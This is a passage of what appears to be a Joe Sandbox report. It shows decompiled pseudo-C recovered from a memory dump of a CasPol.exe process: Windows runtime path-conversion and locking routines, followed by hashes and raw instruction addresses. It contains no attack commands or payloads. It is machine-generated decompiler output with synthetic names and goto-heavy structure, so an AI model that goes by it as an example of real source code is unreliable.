                                                                  																	}
                                                                  																} else {
                                                                  																	L64:
                                                                  																	_t161 = 6;
                                                                  																	goto L17;
                                                                  																}
                                                                  															}
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  											}
                                                                  											goto L101;
                                                                  										} else {
                                                                  											goto L11;
                                                                  										}
                                                                  									}
                                                                  									L17:
                                                                  									if(_t161 != 2) {
                                                                  										_t162 = _t161 - 1;
                                                                  										if(_t162 > 5) {
                                                                  											goto L18;
                                                                  										} else {
                                                                  											switch( *((intOrPtr*)(_t162 * 4 +  &M014145F8))) {
                                                                  												case 0:
                                                                  													_v568 = 0x13d1078;
                                                                  													__eax = 2;
                                                                  													goto L20;
                                                                  												case 1:
                                                                  													goto L18;
                                                                  												case 2:
                                                                  													_t163 = 4;
                                                                  													goto L19;
                                                                  											}
                                                                  										}
                                                                  										goto L41;
                                                                  									} else {
                                                                  										L18:
                                                                  										_t163 = 0;
                                                                  										L19:
                                                                  										_v568 = 0x13d11c4;
                                                                  									}
                                                                  									L20:
                                                                  									_v588 = _t163;
                                                                  									_v564 = _t163 + _t163;
                                                                  									_t306 =  *_v568 & 0x0000ffff;
                                                                  									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                  									_v576 = _t265;
                                                                  									if(_t265 > 0xfffe) {
                                                                  										L90:
                                                                  										_t322 = 0xc0000106;
                                                                  									} else {
                                                                  										if(_t321 != 0) {
                                                                  											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                  												if(_v580 != 0) {
                                                                  													goto L23;
                                                                  												} else {
                                                                  													_t322 = 0xc0000106;
                                                                  													goto L39;
                                                                  												}
                                                                  											} else {
                                                                  												_t177 = _t306;
                                                                  												goto L25;
                                                                  											}
                                                                  											goto L101;
                                                                  										} else {
                                                                  											if(_v580 == _t321) {
                                                                  												_t322 = 0xc000000d;
                                                                  											} else {
                                                                  												L23:
                                                                  												_t173 = L01414620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                  												_t269 = _v592;
                                                                  												_t269[2] = _t173;
                                                                  												if(_t173 == 0) {
                                                                  													_t322 = 0xc0000017;
                                                                  												} else {
                                                                  													_t316 = _v556;
                                                                  													 *_t269 = 0;
                                                                  													_t321 = _t269;
                                                                  													_t269[1] = _v576;
                                                                  													_t177 =  *_v568 & 0x0000ffff;
                                                                  													L25:
                                                                  													_v580 = _t177;
                                                                  													if(_t177 == 0) {
                                                                  														L29:
                                                                  														_t307 =  *_t321 & 0x0000ffff;
                                                                  													} else {
                                                                  														_t290 =  *_t321 & 0x0000ffff;
                                                                  														_v576 = _t290;
                                                                  														_t310 = _t177 & 0x0000ffff;
                                                                  														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                  															_t307 =  *_t321 & 0xffff;
                                                                  														} else {
                                                                  															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                  															L0143F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                  															_t329 = _t329 + 0xc;
                                                                  															_t311 = _v580;
                                                                  															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                  															 *_t321 = _t225;
                                                                  															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                  																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  															}
                                                                  															goto L29;
                                                                  														}
                                                                  													}
                                                                  													_t271 = _v556 - _v588 + _v588;
                                                                  													_v580 = _t307;
                                                                  													_v576 = _t271;
                                                                  													if(_t271 != 0) {
                                                                  														_t308 = _t271 & 0x0000ffff;
                                                                  														_v588 = _t308;
                                                                  														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                  															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                  															L0143F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                  															_t329 = _t329 + 0xc;
                                                                  															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                  															 *_t321 = _t213;
                                                                  															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                  																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                  															}
                                                                  														}
                                                                  													}
                                                                  													_t272 = _v560;
                                                                  													if(_t272 != 0) {
                                                                  														 *_t272 = _t321;
                                                                  													}
                                                                  													_t306 = 0;
                                                                  													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  													_t275 = _v572;
                                                                  													if(_t275 != 0) {
                                                                  														_t306 =  *_t275;
                                                                  														if(_t306 != 0) {
                                                                  															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                  														}
                                                                  													}
                                                                  													_t181 = _v544;
                                                                  													if(_t181 != 0) {
                                                                  														 *_t181 = 0;
                                                                  														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                  														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                  														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                  														if(_v540 == 5) {
                                                                  															_t182 = E013F52A5(1);
                                                                  															_v588 = _t182;
                                                                  															if(_t182 == 0) {
                                                                  																E0140EB70(1, 0x14e79a0);
                                                                  																goto L38;
                                                                  															} else {
                                                                  																_v560 = _t182 + 0xc;
                                                                  																_t185 = E0140AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                  																if(_t185 == 0) {
                                                                  																	_t324 = _v588;
                                                                  																	goto L97;
                                                                  																} else {
                                                                  																	_t306 = _v544;
                                                                  																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                  																	 *(_t306 + 4) = _t282;
                                                                  																	_v576 = _t282;
                                                                  																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                  																	 *_t306 = _t325;
                                                                  																	if( *_t282 == 0x5c) {
                                                                  																		_t149 = _t325 - 2; // -2
                                                                  																		_t283 = _t149;
                                                                  																		 *_t306 = _t283;
                                                                  																		 *(_t306 + 4) = _v576 + 2;
                                                                  																		_t185 = _t283 & 0x0000ffff;
                                                                  																	}
                                                                  																	_t324 = _v588;
                                                                  																	 *(_t306 + 2) = _t185;
                                                                  																	if((_v548 & 0x00000002) == 0) {
                                                                  																		L97:
                                                                  																		asm("lock xadd [esi], eax");
                                                                  																		if((_t185 | 0xffffffff) == 0) {
                                                                  																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                  																			E014395D0();
                                                                  																			L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                  																		}
                                                                  																	} else {
                                                                  																		 *(_t306 + 0xc) = _t324;
                                                                  																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                  																	}
                                                                  																	goto L38;
                                                                  																}
                                                                  															}
                                                                  															goto L41;
                                                                  														}
                                                                  													}
                                                                  													L38:
                                                                  													_t322 = 0;
                                                                  												}
                                                                  											}
                                                                  										}
                                                                  									}
                                                                  									L39:
                                                                  									if(_t254 !=  &_v532) {
                                                                  										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                  									}
                                                                  									_t169 = _t322;
                                                                  								}
                                                                  								goto L41;
                                                                  							}
                                                                  							goto L68;
                                                                  						}
                                                                  					}
                                                                  					L41:
                                                                  					_pop(_t317);
                                                                  					_pop(_t323);
                                                                  					_pop(_t255);
                                                                  					return L0143B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                  				} else {
                                                                  					_t299 = __edx[2];
                                                                  					if( *_t299 == 0x5c) {
                                                                  						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                  						if(_t256 != 0x5c) {
                                                                  							if(_t256 != 0x3f) {
                                                                  								goto L2;
                                                                  							} else {
                                                                  								goto L50;
                                                                  							}
                                                                  						} else {
                                                                  							L50:
                                                                  							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                  								goto L2;
                                                                  							} else {
                                                                  								_t251 = E01433D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                  								_pop(_t319);
                                                                  								_pop(_t326);
                                                                  								_pop(_t257);
                                                                  								return L0143B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						L2:
                                                                  						_t260 = _v572;
                                                                  						goto L3;
                                                                  					}
                                                                  				}
                                                                  				L101:
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                                                                  • Instruction ID: 26496bfcbf3c3d1dc19182e97972b31d9ea6d3d3146586d54bf346c6b5cf4ccc
                                                                  • Opcode Fuzzy Hash: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                                                                  • Instruction Fuzzy Hash: F0F16C706082118BD764CF59C480A7BB7E1EF98754F18492FF986CB3A5E734D982CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 92%
                                                                  			E014220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                  				signed int _v16;
                                                                  				signed int _v20;
                                                                  				signed char _v24;
                                                                  				intOrPtr _v28;
                                                                  				signed int _v32;
                                                                  				void* _v36;
                                                                  				char _v48;
                                                                  				signed int _v52;
                                                                  				signed int _v56;
                                                                  				unsigned int _v60;
                                                                  				char _v64;
                                                                  				unsigned int _v68;
                                                                  				signed int _v72;
                                                                  				char _v73;
                                                                  				signed int _v74;
                                                                  				char _v75;
                                                                  				signed int _v76;
                                                                  				void* _v81;
                                                                  				void* _v82;
                                                                  				void* _v89;
                                                                  				void* _v92;
                                                                  				void* _v97;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* __ebp;
                                                                  				signed char _t128;
                                                                  				void* _t129;
                                                                  				signed int _t130;
                                                                  				void* _t132;
                                                                  				signed char _t133;
                                                                  				intOrPtr _t135;
                                                                  				signed int _t137;
                                                                  				signed int _t140;
                                                                  				signed int* _t144;
                                                                  				signed int* _t145;
                                                                  				intOrPtr _t146;
                                                                  				signed int _t147;
                                                                  				signed char* _t148;
                                                                  				signed int _t149;
                                                                  				signed int _t153;
                                                                  				signed int _t169;
                                                                  				signed int _t174;
                                                                  				signed int _t180;
                                                                  				void* _t197;
                                                                  				void* _t198;
                                                                  				signed int _t201;
                                                                  				intOrPtr* _t202;
                                                                  				intOrPtr* _t205;
                                                                  				signed int _t210;
                                                                  				signed int _t215;
                                                                  				signed int _t218;
                                                                  				signed char _t221;
                                                                  				signed int _t226;
                                                                  				char _t227;
                                                                  				signed int _t228;
                                                                  				void* _t229;
                                                                  				unsigned int _t231;
                                                                  				void* _t235;
                                                                  				signed int _t240;
                                                                  				signed int _t241;
                                                                  				void* _t242;
                                                                  				signed int _t246;
                                                                  				signed int _t248;
                                                                  				signed int _t252;
                                                                  				signed int _t253;
                                                                  				void* _t254;
                                                                  				intOrPtr* _t256;
                                                                  				intOrPtr _t257;
                                                                  				unsigned int _t262;
                                                                  				signed int _t265;
                                                                  				void* _t267;
                                                                  				signed int _t275;
                                                                  
                                                                  				_t198 = __ebx;
                                                                  				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                  				_v68 = __ecx;
                                                                  				_v73 = 0;
                                                                  				_t201 = __edx & 0x00002000;
                                                                  				_t128 = __edx & 0xffffdfff;
                                                                  				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                  				_v72 = _t128;
                                                                  				if((_t128 & 0x00000008) != 0) {
                                                                  					__eflags = _t128 - 8;
                                                                  					if(_t128 != 8) {
                                                                  						L69:
                                                                  						_t129 = 0xc000000d;
                                                                  						goto L23;
                                                                  					} else {
                                                                  						_t130 = 0;
                                                                  						_v72 = 0;
                                                                  						_v75 = 1;
                                                                  						L2:
                                                                  						_v74 = 1;
                                                                  						_t226 =  *0x14e8714; // 0x0
                                                                  						if(_t226 != 0) {
                                                                  							__eflags = _t201;
                                                                  							if(_t201 != 0) {
                                                                  								L62:
                                                                  								_v74 = 1;
                                                                  								L63:
                                                                  								_t130 = _t226 & 0xffffdfff;
                                                                  								_v72 = _t130;
                                                                  								goto L3;
                                                                  							}
                                                                  							_v74 = _t201;
                                                                  							__eflags = _t226 & 0x00002000;
                                                                  							if((_t226 & 0x00002000) == 0) {
                                                                  								goto L63;
                                                                  							}
                                                                  							goto L62;
                                                                  						}
                                                                  						L3:
                                                                  						_t227 = _v75;
                                                                  						L4:
                                                                  						_t240 = 0;
                                                                  						_v56 = 0;
                                                                  						_t252 = _t130 & 0x00000100;
                                                                  						if(_t252 != 0 || _t227 != 0) {
                                                                  							_t240 = _v68;
                                                                  							_t132 = L01422EB0(_t240);
                                                                  							__eflags = _t132 - 2;
                                                                  							if(_t132 != 2) {
                                                                  								__eflags = _t132 - 1;
                                                                  								if(_t132 == 1) {
                                                                  									goto L25;
                                                                  								}
                                                                  								__eflags = _t132 - 6;
                                                                  								if(_t132 == 6) {
                                                                  									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                  									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                  										goto L40;
                                                                  									}
                                                                  									_t197 = L01422EB0(_t240 + 8);
                                                                  									__eflags = _t197 - 2;
                                                                  									if(_t197 == 2) {
                                                                  										goto L25;
                                                                  									}
                                                                  								}
                                                                  								L40:
                                                                  								_t133 = 1;
                                                                  								L26:
                                                                  								_t228 = _v75;
                                                                  								_v56 = _t240;
                                                                  								__eflags = _t133;
                                                                  								if(_t133 != 0) {
                                                                  									__eflags = _t228;
                                                                  									if(_t228 == 0) {
                                                                  										L43:
                                                                  										__eflags = _v72;
                                                                  										if(_v72 == 0) {
                                                                  											goto L8;
                                                                  										}
                                                                  										goto L69;
                                                                  									}
                                                                  									_t133 = E013F58EC(_t240);
                                                                  									_t221 =  *0x14e5cac; // 0x16
                                                                  									__eflags = _t221 & 0x00000040;
                                                                  									if((_t221 & 0x00000040) != 0) {
                                                                  										_t228 = 0;
                                                                  										__eflags = _t252;
                                                                  										if(_t252 != 0) {
                                                                  											goto L43;
                                                                  										}
                                                                  										_t133 = _v72;
                                                                  										goto L7;
                                                                  									}
                                                                  									goto L43;
                                                                  								} else {
                                                                  									_t133 = _v72;
                                                                  									goto L6;
                                                                  								}
                                                                  							}
                                                                  							L25:
                                                                  							_t133 = _v73;
                                                                  							goto L26;
                                                                  						} else {
                                                                  							L6:
                                                                  							_t221 =  *0x14e5cac; // 0x16
                                                                  							L7:
                                                                  							if(_t133 != 0) {
                                                                  								__eflags = _t133 & 0x00001000;
                                                                  								if((_t133 & 0x00001000) != 0) {
                                                                  									_t133 = _t133 | 0x00000a00;
                                                                  									__eflags = _t221 & 0x00000004;
                                                                  									if((_t221 & 0x00000004) != 0) {
                                                                  										_t133 = _t133 | 0x00000400;
                                                                  									}
                                                                  								}
                                                                  								__eflags = _t228;
                                                                  								if(_t228 != 0) {
                                                                  									_t133 = _t133 | 0x00000100;
                                                                  								}
                                                                  								_t229 = E01434A2C(0x14e6e40, 0x1434b30, _t133, _t240);
                                                                  								__eflags = _t229;
                                                                  								if(_t229 == 0) {
                                                                  									_t202 = _a20;
                                                                  									goto L100;
                                                                  								} else {
                                                                  									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                  									L15:
                                                                  									_t202 = _a20;
                                                                  									 *_t202 = _t135;
                                                                  									if(_t229 == 0) {
                                                                  										L100:
                                                                  										 *_a4 = 0;
                                                                  										_t137 = _a8;
                                                                  										__eflags = _t137;
                                                                  										if(_t137 != 0) {
                                                                  											 *_t137 = 0;
                                                                  										}
                                                                  										 *_t202 = 0;
                                                                  										_t129 = 0xc0000017;
                                                                  										goto L23;
                                                                  									} else {
                                                                  										_t242 = _a16;
                                                                  										if(_t242 != 0) {
                                                                  											_t254 = _t229;
                                                                  											memcpy(_t242, _t254, 0xd << 2);
                                                                  											_t267 = _t267 + 0xc;
                                                                  											_t242 = _t254 + 0x1a;
                                                                  										}
                                                                  										_t205 = _a4;
                                                                  										_t25 = _t229 + 0x48; // 0x48
                                                                  										 *_t205 = _t25;
                                                                  										_t140 = _a8;
                                                                  										if(_t140 != 0) {
                                                                  											__eflags =  *((char*)(_t267 + 0xa));
                                                                  											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                  												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                  											} else {
                                                                  												 *_t140 = 0;
                                                                  											}
                                                                  										}
                                                                  										_t256 = _a12;
                                                                  										if(_t256 != 0) {
                                                                  											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                  										}
                                                                  										_t257 =  *_t205;
                                                                  										_v48 = 0;
                                                                  										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                  										_v56 = 0;
                                                                  										_v52 = 0;
                                                                  										_t144 =  *( *[fs:0x30] + 0x50);
                                                                  										if(_t144 != 0) {
                                                                  											__eflags =  *_t144;
                                                                  											if( *_t144 == 0) {
                                                                  												goto L20;
                                                                  											}
                                                                  											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                  											goto L21;
                                                                  										} else {
                                                                  											L20:
                                                                  											_t145 = 0x7ffe0384;
                                                                  											L21:
                                                                  											if( *_t145 != 0) {
                                                                  												_t146 =  *[fs:0x30];
                                                                  												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                  												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                  													_t147 = E01417D50();
                                                                  													__eflags = _t147;
                                                                  													if(_t147 == 0) {
                                                                  														_t148 = 0x7ffe0385;
                                                                  													} else {
                                                                  														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                  													}
                                                                  													__eflags =  *_t148 & 0x00000020;
                                                                  													if(( *_t148 & 0x00000020) != 0) {
                                                                  														_t149 = _v72;
                                                                  														__eflags = _t149;
                                                                  														if(__eflags == 0) {
                                                                  															_t149 = 0x13d5c80;
                                                                  														}
                                                                  														_push(_t149);
                                                                  														_push( &_v48);
                                                                  														 *((char*)(_t267 + 0xb)) = L0142F6E0(_t198, _t242, _t257, __eflags);
                                                                  														_push(_t257);
                                                                  														_push( &_v64);
                                                                  														_t153 = L0142F6E0(_t198, _t242, _t257, __eflags);
                                                                  														__eflags =  *((char*)(_t267 + 0xb));
                                                                  														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                  															__eflags = _t153;
                                                                  															if(_t153 != 0) {
                                                                  																__eflags = 0;
                                                                  																E01477016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                  																L01412400(_t267 + 0x20);
                                                                  															}
                                                                  															L01412400( &_v64);
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  											}
                                                                  											_t129 = 0;
                                                                  											L23:
                                                                  											return _t129;
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  							L8:
                                                                  							_t275 = _t240;
                                                                  							if(_t275 != 0) {
                                                                  								_v73 = 0;
                                                                  								_t253 = 0;
                                                                  								__eflags = 0;
                                                                  								L29:
                                                                  								_push(0);
                                                                  								_t241 = E01422397(_t240);
                                                                  								__eflags = _t241;
                                                                  								if(_t241 == 0) {
                                                                  									_t229 = 0;
                                                                  									L14:
                                                                  									_t135 = 0;
                                                                  									goto L15;
                                                                  								}
                                                                  								__eflags =  *((char*)(_t267 + 0xb));
                                                                  								 *(_t241 + 0x34) = 1;
                                                                  								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                  									E01412280(_t134, 0x14e8608);
                                                                  									__eflags =  *0x14e6e48 - _t253; // 0x0
                                                                  									if(__eflags != 0) {
                                                                  										L48:
                                                                  										_t253 = 0;
                                                                  										__eflags = 0;
                                                                  										L49:
                                                                  										L0140FFB0(_t198, _t241, 0x14e8608);
                                                                  										__eflags = _t253;
                                                                  										if(_t253 != 0) {
                                                                  											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                  										}
                                                                  										goto L31;
                                                                  									}
                                                                  									 *0x14e6e48 = _t241;
                                                                  									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                  									__eflags = _t253;
                                                                  									if(_t253 != 0) {
                                                                  										_t57 = _t253 + 0x34;
                                                                  										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                  										__eflags =  *_t57;
                                                                  										if( *_t57 == 0) {
                                                                  											goto L49;
                                                                  										}
                                                                  									}
                                                                  									goto L48;
                                                                  								}
                                                                  								L31:
                                                                  								_t229 = _t241;
                                                                  								goto L14;
                                                                  							}
                                                                  							_v73 = 1;
                                                                  							_v64 = _t240;
                                                                  							asm("lock bts dword [esi], 0x0");
                                                                  							if(_t275 < 0) {
                                                                  								_t231 =  *0x14e8608; // 0x0
                                                                  								while(1) {
                                                                  									_v60 = _t231;
                                                                  									__eflags = _t231 & 0x00000001;
                                                                  									if((_t231 & 0x00000001) != 0) {
                                                                  										goto L76;
                                                                  									}
                                                                  									_t73 = _t231 + 1; // 0x1
                                                                  									_t210 = _t73;
                                                                  									asm("lock cmpxchg [edi], ecx");
                                                                  									__eflags = _t231 - _t231;
                                                                  									if(_t231 != _t231) {
                                                                  										L92:
                                                                  										_t133 = E01426B90(_t210,  &_v64);
                                                                  										_t262 =  *0x14e8608; // 0x0
                                                                  										L93:
                                                                  										_t231 = _t262;
                                                                  										continue;
                                                                  									}
                                                                  									_t240 = _v56;
                                                                  									goto L10;
                                                                  									L76:
                                                                  									_t169 = E0142E180(_t133);
                                                                  									__eflags = _t169;
                                                                  									if(_t169 != 0) {
                                                                  										_push(0xc000004b);
                                                                  										_push(0xffffffff);
                                                                  										L014397C0();
                                                                  										_t231 = _v68;
                                                                  									}
                                                                  									_v72 = 0;
                                                                  									_v24 =  *( *[fs:0x18] + 0x24);
                                                                  									_v16 = 3;
                                                                  									_v28 = 0;
                                                                  									__eflags = _t231 & 0x00000002;
                                                                  									if((_t231 & 0x00000002) == 0) {
                                                                  										_v32 =  &_v36;
                                                                  										_t174 = _t231 >> 4;
                                                                  										__eflags = 1 - _t174;
                                                                  										_v20 = _t174;
                                                                  										asm("sbb ecx, ecx");
                                                                  										_t210 = 3 |  &_v36;
                                                                  										__eflags = _t174;
                                                                  										if(_t174 == 0) {
                                                                  											_v20 = 0xfffffffe;
                                                                  										}
                                                                  									} else {
                                                                  										_v32 = 0;
                                                                  										_v20 = 0xffffffff;
                                                                  										_v36 = _t231 & 0xfffffff0;
                                                                  										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                  										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                  									}
                                                                  									asm("lock cmpxchg [edi], esi");
                                                                  									_t262 = _t231;
                                                                  									__eflags = _t262 - _t231;
                                                                  									if(_t262 != _t231) {
                                                                  										goto L92;
                                                                  									} else {
                                                                  										__eflags = _v72;
                                                                  										if(_v72 != 0) {
                                                                  											E0143006A(0x14e8608, _t210);
                                                                  										}
                                                                  										__eflags =  *0x7ffe036a - 1;
                                                                  										if(__eflags <= 0) {
                                                                  											L89:
                                                                  											_t133 =  &_v16;
                                                                  											asm("lock btr dword [eax], 0x1");
                                                                  											if(__eflags >= 0) {
                                                                  												goto L93;
                                                                  											} else {
                                                                  												goto L90;
                                                                  											}
                                                                  											do {
                                                                  												L90:
                                                                  												_push(0);
                                                                  												_push(0x14e8608);
                                                                  												E0143B180();
                                                                  												_t133 = _v24;
                                                                  												__eflags = _t133 & 0x00000004;
                                                                  											} while ((_t133 & 0x00000004) == 0);
                                                                  											goto L93;
                                                                  										} else {
                                                                  											_t218 =  *0x14e6904; // 0x400
                                                                  											__eflags = _t218;
                                                                  											if(__eflags == 0) {
                                                                  												goto L89;
                                                                  											} else {
                                                                  												goto L87;
                                                                  											}
                                                                  											while(1) {
                                                                  												L87:
                                                                  												__eflags = _v16 & 0x00000002;
                                                                  												if(__eflags == 0) {
                                                                  													goto L89;
                                                                  												}
                                                                  												asm("pause");
                                                                  												_t218 = _t218 - 1;
                                                                  												__eflags = _t218;
                                                                  												if(__eflags != 0) {
                                                                  													continue;
                                                                  												}
                                                                  												goto L89;
                                                                  											}
                                                                  											goto L89;
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  							L10:
                                                                  							_t229 =  *0x14e6e48; // 0x0
                                                                  							_v72 = _t229;
                                                                  							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                  								L0140FFB0(_t198, _t240, 0x14e8608);
                                                                  								_t253 = _v76;
                                                                  								goto L29;
                                                                  							} else {
                                                                  								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                  								asm("lock cmpxchg [esi], ecx");
                                                                  								_t215 = 1;
                                                                  								if(1 != 1) {
                                                                  									while(1) {
                                                                  										_t246 = _t215 & 0x00000006;
                                                                  										_t180 = _t215;
                                                                  										__eflags = _t246 - 2;
                                                                  										_v56 = _t246;
                                                                  										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                  										asm("lock cmpxchg [edi], esi");
                                                                  										_t248 = _v56;
                                                                  										__eflags = _t180 - _t215;
                                                                  										if(_t180 == _t215) {
                                                                  											break;
                                                                  										}
                                                                  										_t215 = _t180;
                                                                  									}
                                                                  									__eflags = _t248 - 2;
                                                                  									if(_t248 == 2) {
                                                                  										__eflags = 0;
                                                                  										E014300C2(0x14e8608, 0, _t235);
                                                                  									}
                                                                  									_t229 = _v72;
                                                                  								}
                                                                  								goto L14;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				_t227 = 0;
                                                                  				_v75 = 0;
                                                                  				if(_t128 != 0) {
                                                                  					goto L4;
                                                                  				}
                                                                  				goto L2;
                                                                  			}
                                                                  0x01422124
                                                                  0x01422231
                                                                  0x01422236
                                                                  0x01422236
                                                                  0x01422238
                                                                  0x01422238
                                                                  0x01422240
                                                                  0x01422242
                                                                  0x01422244
                                                                  0x014659fc
                                                                  0x0142218c
                                                                  0x0142218c
                                                                  0x00000000
                                                                  0x0142218c
                                                                  0x0142224a
                                                                  0x0142224f
                                                                  0x01422256
                                                                  0x01422304
                                                                  0x01422309
                                                                  0x0142230f
                                                                  0x0142231e
                                                                  0x0142231e
                                                                  0x0142231e
                                                                  0x01422320
                                                                  0x01422325
                                                                  0x0142232a
                                                                  0x0142232c
                                                                  0x0142233e
                                                                  0x0142233e
                                                                  0x00000000
                                                                  0x0142232c
                                                                  0x01422311
                                                                  0x01422317
                                                                  0x0142231a
                                                                  0x0142231c
                                                                  0x01422380
                                                                  0x01422380
                                                                  0x01422380
                                                                  0x01422384
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01422386
                                                                  0x00000000
                                                                  0x0142231c
                                                                  0x0142225c
                                                                  0x0142225c
                                                                  0x00000000
                                                                  0x0142225c
                                                                  0x0142212a
                                                                  0x01422134
                                                                  0x01422138
                                                                  0x0142213d
                                                                  0x01465858
                                                                  0x01465863
                                                                  0x01465863
                                                                  0x01465867
                                                                  0x0146586a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146586c
                                                                  0x0146586c
                                                                  0x01465871
                                                                  0x01465875
                                                                  0x01465877
                                                                  0x01465997
                                                                  0x0146599c
                                                                  0x014659a1
                                                                  0x014659a7
                                                                  0x014659a7
                                                                  0x00000000
                                                                  0x014659a7
                                                                  0x0146587d
                                                                  0x00000000
                                                                  0x0146588b
                                                                  0x0146588b
                                                                  0x01465890
                                                                  0x01465892
                                                                  0x01465894
                                                                  0x01465899
                                                                  0x0146589b
                                                                  0x014658a0
                                                                  0x014658a0
                                                                  0x014658aa
                                                                  0x014658b2
                                                                  0x014658b6
                                                                  0x014658be
                                                                  0x014658c6
                                                                  0x014658c9
                                                                  0x0146590d
                                                                  0x01465917
                                                                  0x0146591a
                                                                  0x0146591c
                                                                  0x01465920
                                                                  0x01465928
                                                                  0x0146592a
                                                                  0x0146592c
                                                                  0x0146592e
                                                                  0x0146592e
                                                                  0x014658cb
                                                                  0x014658cd
                                                                  0x014658d8
                                                                  0x014658e0
                                                                  0x014658f4
                                                                  0x014658fe
                                                                  0x014658fe
                                                                  0x0146593a
                                                                  0x0146593e
                                                                  0x01465940
                                                                  0x01465942
                                                                  0x00000000
                                                                  0x01465944
                                                                  0x01465944
                                                                  0x01465949
                                                                  0x0146594e
                                                                  0x0146594e
                                                                  0x01465953
                                                                  0x0146595b
                                                                  0x01465976
                                                                  0x01465976
                                                                  0x0146597a
                                                                  0x0146597f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465981
                                                                  0x01465981
                                                                  0x01465981
                                                                  0x01465983
                                                                  0x01465988
                                                                  0x0146598d
                                                                  0x01465991
                                                                  0x01465991
                                                                  0x00000000
                                                                  0x0146595d
                                                                  0x0146595d
                                                                  0x01465963
